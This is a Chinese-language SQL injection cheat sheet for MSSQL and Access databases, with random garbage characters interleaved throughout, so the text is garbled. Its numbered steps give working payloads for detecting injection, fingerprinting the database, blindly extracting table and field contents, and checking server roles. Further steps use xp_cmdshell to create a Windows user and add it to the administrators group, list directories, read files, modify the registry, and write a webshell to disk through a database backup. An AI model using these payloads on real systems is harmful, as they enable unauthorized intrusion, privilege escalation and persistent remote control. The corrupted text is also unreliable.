1.判断是否有注入;and 1=1 ;and 1=2 �6�ex/TySM
2.初步判断是否是mssql ;and user>0 /NFj(�+&g+
y��u|8_<bq
3.注入参数是字符'and [查询条件] and ''=' �FUb\�e-Q=
^|>P�A:�%�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' X-K��h(�Z
2(�+�2+�}�
5.判断数据库系统 q`a'g�Jx#y
���1#�2 I
;and (select count(*) from sysobjects)>0 mssql MUc$��j��&
@ioJ]��$o7
;and (select count(*) from msysobjects)>0 access [���5b--O�
a0E�)2vt4�
�j0�aXyLNX
�k5�e;fA/w
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �s`8�= 3]w
9T���9�!kb
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 {d���uz\k2
}C?�'�BRX
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �2\{M:\�2o
7U"g3�a�)=
9.(1)猜字段的ascii值(access) itP,\k7>d�
*#|&JI�Esi
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 7�83,s��_�
>�T-u~i$s
(2)猜字段的ascii值(mssql) *n
]Gs�OOn
C2I_%nU Z1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 aFm�_;��\
&`��r-.�&Y
10.测试权限结构(mssql) -3�*]G�^y2
#q�$�HQ&k�
hWLA<�wdb�
�f~R(D0�@�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- _��<�V)-Y
;`{H��!w[D
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 7Q9 �w?y~c
"+nR�G�Es6
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- U9��� �s&
�?e4YGOe�.
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- t�%�)7t�9j
#gN&lY:CFn
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- bsli0FJSh'
_J�#�zY-�j
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- lfgq��=8�d
�Qd{C�Mm�x
;and 1=(select IS_MEMBER('db_owner'));-- ��;e�f}}�K
o:'MpKm���
GL}]�y �-f
ec;o\erPG�
11.添加mssql和系统的帐户 I$G['`�XX/
�{dlXL�x!B
;exec master.dbo.sp_addlogin username;-- ^uc�=f2=>,
;exec master.dbo.sp_password null,username,password;-- R)� h�#Vc(
Dml;#'IF3
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- #:_K��ws>+
_;�y9�$�"A
;exec master.dbo.xp_cmdshell 'net user username password Dx?,�=~�W9
LonxT&�"!D
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Bk�c4��TO
i�&fuSk EP
;exec master.dbo.xp_cmdshell 'net user username password /add';-- &6!)�jIWJ
��
8dA~�\a
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- #zs~," dRv
T�?�0e�VvM
*�?vCC+�c�
<n�$'voR7]
12.(1)遍历目录 �(%�6�P0�*
�N�ai2W�<,
;create table dirs(paths varchar(100), id int) S�z`,X�0�a
��t3�_O H^
;insert dirs exec master.dbo.xp_dirtree 'c:\' 0#hlsfc]�\
��1C�Zgb��
;and (select top 1 paths from dirs)>0 �`U_��)9�8
6�d��}lw6L
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) /{_�:{G!Q0
9TC,!0U{_.
�q3�!bk�y\
�@S;'@V�C
(2)遍历目录 /,yd+�wcW#
� mq�.`X:e
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ZMlm�)?m��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 bAqA1y3��=
���p]TAELy
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 2%�m B���K
&p@O��_0nF
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 DyQy^G'%l�
C,r;VyW6BI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 v\ �)W?i*l
M%m4i�9~!?
(L&d�!$,Dv
�[z{1*�Xc
13.mssql中的存储过程 �g��!�|kp?
=dKtV��.L�
xp_regenumvalues 注册表根键, 子键 :5<U�kN)R(
��#�;�y�Z�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #;e:A8��IQ
�6bC3O4R�w
xp_regread 根键,子键,键值名 x� �9�fip-
��
}my`K�
;exec xp_regread S,U��Dezxg
5t]H��?b8
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 q0vQ�����a
A;�M'LM-�M
xp_regwrite 根键,子键, 值名, 值类型, 值 u6JM]k�R��
V)25$aKW7�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 }�Sv:`9�=�
Y$��_�B�1_
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �#\OA��)`U
0GeT�S��Fj
xp_regdeletevalue 根键,子键,值名 us��F.bkTp
8l`*]�1.W<
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �#*�Ctwl,T
h:��|qC`�}
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �wmLs/:~��
YS�0<qSN��
�} q8ASYNc
�4tBYR9�|�
14.mssql的backup创建webshell ��=��7eV/3
��8d�'0N
use model �Wne@<+m�X
^�1.B�y^
$
create table cmd(str image); 26h2�1Z16q
�eSq.�G�tI
insert into cmd(str) values (''); b��\2
d�s,
�~4'$�yW�G
backup database model to disk='c:\l.asp'; FZn�w0tMq
�3!]�rmZ-W
�(Gf���Z�*
> ~�O.@�|�
15.mssql内置函数 tWc��Hb #�
��VOL�j>w
;and (select @@version)>0 获得Windows的版本号 gP�P�k��T"
WNt�W|I�V�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ww1[rCh\+�
]/L�0,^R�I
;and (select user_name())>0 爆当前系统的连接用户 <e6#lF�QqK
OneY�_<*a<
;and (select db_name())>0 得到当前连接的数据库 D�&y7-�/
0g8NHkM:2a
&};z�vo~P.
;$g?T�~v�7
16.简洁的webshell V�'gh�6�`v
5{�,<j\#L�
use model 9pfIzs
su3
ECmW`#Otb)
create table cmd(str image); Z%�UP���6%
,ig/s2ZG6X
insert into cmd(str) values (''); 8}�:nGK|kx
FS.L\MjV]U
backup database model to disk='g:\wwwtest\l.asp';
